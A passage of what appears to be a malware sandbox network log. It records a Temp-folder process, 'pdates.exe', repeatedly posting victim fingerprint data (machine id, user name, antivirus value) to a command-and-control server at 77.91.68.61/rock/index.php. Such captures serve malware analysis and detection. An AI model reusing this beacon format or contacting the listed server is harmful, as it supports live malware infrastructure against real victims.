Jul 27, 2023 01:34:25.047175884 CEST	3911	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:25 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
309	192.168.2.5	50029	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:25.207689047 CEST	3912	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:25.257458925 CEST	3912	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:25 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
31	192.168.2.5	49747	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:09.891262054 CEST	2863	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:09.939722061 CEST	2864	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:09 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
310	192.168.2.5	50030	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:25.440679073 CEST	3913	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:25.490322113 CEST	3913	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:25 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
311	192.168.2.5	50031	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:25.691427946 CEST	3914	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:25.740819931 CEST	3914	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:25 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
312	192.168.2.5	50032	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:25.917424917 CEST	3916	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:25.966634035 CEST	3916	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:25 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
313	192.168.2.5	50033	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:26.124155045 CEST	3917	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:26.173513889 CEST	3918	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:26 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
314	192.168.2.5	50034	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:26.340091944 CEST	3919	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:26.389383078 CEST	3919	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:26 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
315	192.168.2.5	50035	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:26.556765079 CEST	3920	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:26.606719017 CEST	3920	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:26 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
316	192.168.2.5	50036	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:26.794791937 CEST	3921	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:26.843409061 CEST	3921	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:26 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
317	192.168.2.5	50037	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:27.056710005 CEST	3922	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:27.104681015 CEST	3922	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:27 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
318	192.168.2.5	50038	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:27.266957998 CEST	3923	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:27.314977884 CEST	3923	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:27 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
319	192.168.2.5	50039	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:27.492252111 CEST	3924	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:27.541235924 CEST	3924	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:27 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
32	192.168.2.5	49748	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:10.152626038 CEST	2864	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:10.201159954 CEST	2865	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:10 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
320	192.168.2.5	50040	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:27.706506014 CEST	3925	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:27.755167961 CEST	3925	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:27 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
321	192.168.2.5	50041	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:27.917309046 CEST	3926	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:27.968139887 CEST	3926	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:27 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
322	192.168.2.5	50042	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:28.136903048 CEST	3927	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:28.186351061 CEST	3927	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:28 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
323	192.168.2.5	50043	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:28.376530886 CEST	3928	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:28.427226067 CEST	3928	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:28 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
324	192.168.2.5	50044	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:28.587277889 CEST	3928	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:28.638221025 CEST	3929	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:28 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
325	192.168.2.5	50045	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:28.807893991 CEST	3929	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:28.857739925 CEST	3930	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:28 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
326	192.168.2.5	50046	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:29.059276104 CEST	3930	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:29.109671116 CEST	3931	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:29 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
327	192.168.2.5	50047	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:29.279542923 CEST	3931	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:29.327747107 CEST	3932	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:29 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
328	192.168.2.5	50048	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:29.490823030 CEST	3932	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:29.539735079 CEST	3933	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:29 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
329	192.168.2.5	50049	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:29.715428114 CEST	3934	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:29.764954090 CEST	3934	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:29 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
33	192.168.2.5	49749	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
